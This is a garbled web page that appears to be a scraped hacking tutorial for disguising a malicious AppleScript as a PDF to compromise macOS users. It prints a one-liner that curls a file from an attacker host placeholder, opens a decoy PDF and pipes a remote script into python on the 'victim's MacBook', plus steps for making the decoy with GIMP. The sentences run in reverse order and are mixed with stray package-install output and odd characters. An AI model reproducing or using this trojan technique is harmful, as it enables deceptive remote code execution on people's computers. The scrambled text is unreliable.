![]() The attacker's server is set as a variable ( s= ATTACKER-IP-ADDRESS:PORT), and should be changed to the attacker's local IP address.The start of the script ( do shell script) is the AppleScript that instructs the MacBook to run the following code.do shell script "s=ATTACKER-IP-ADDRESS:PORT curl -s $s/real.pdf | open -f -a Preview.app & curl -s $s/script | python -" #Dialog maker applescript pdfThis is the one-liner AppleScript that will be executed on the victim's MacBook when the fake PDF is double-clicked. Then, search for and open Apple's built-in Script Editor from Spotlight, Launchpad, or the "Utilities" folder in "Applications," then copy the below script into the window. This will allow the attacker to see a side-by-side comparison while creating the fake PDF. To start, copy the real PDF that's going to be cloned to the macOS desktop. ![]() #Dialog maker applescript fullIf readers would like a full Kali Linux method, please leave a comment below, and I'll see what I can do. To keep things simple, I'll use macOS with AppleScript version 2.7 and Script Editor version 2.10. It should be possible to create trojanized AppleScripts using Kali, but it's a bit more involved than this article allows for. To create the malicious AppleScript (fake PDF), I'll be using Script Editor in macOS High Sierra. That's it for the Kali Linux end of things. The cover.icns is the Apple icon file which will be used in a later step. The real.pdf is a small PDF that will be downloaded by the target every time the AppleScript (the fake PDF) is opened. The cover.jpg and cover.png were used as templates and are no longer required. There should now be four files in the files/ directory (you can check with ls). When the conversion is finished, download and save the. Next, export the image to the files/ directory by navigating to "File," then "Export As." Change the file name to real.pdf and file type to "Portable Document Format (*.pdf)." ~# gimp cover.jpg Step 3: Export the Cover Image as a PDF Processing triggers for desktop-file-utils (0.23-4) installed, open cover.jpg in GIMP with the below command. Processing triggers for man-db (2.8.5-2). Processing triggers for libc-bin (2.30-2). Processing triggers for gnome-menus (3.31.4-3). Processing triggers for hicolor-icon-theme (0.17-2). Processing triggers for mime-support (3.62). Libswresample3 libswscale5 libumfpack5 libvp圆 libwebpmux3 libx265-179 Libpostproc55 libraw19 librubberband2 libsdl2-2.0-0 libsuitesparseconfig5 Libjson-c4 libmetis5 libmypaint-1.5-1 libmypaint-common libmysofa1 libopenexr24 ![]() Libcolamd2 libgegl-0.4-0 libgegl-common libgimp2.0 libheif1 libilmbase24 Libavutil56 libbabl-0.1-0 libcamd2 libccolamd2 libcholmod3 libcodec2-0.9 Gimp-data libamd2 libavcodec58 libavfilter7 libavformat58 libavresample4 ![]() The following additional packages will be installed: Libmysofa0 libtasn1-doc libwireshark11 libwiretap8 libwscodecs2 libwsutil9 The following packages were automatically installed and are no longer required:ĭh-python libcodec2-0.8.1 libcrystalhd3 libdouble-conversion1 liblinear3 #Dialog maker applescript installTo install it, use the apt-get command below. In order to manipulate the PDF's cover image, we'll need GIMP, a popular image-manipulation application that's totally free. ![]()
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |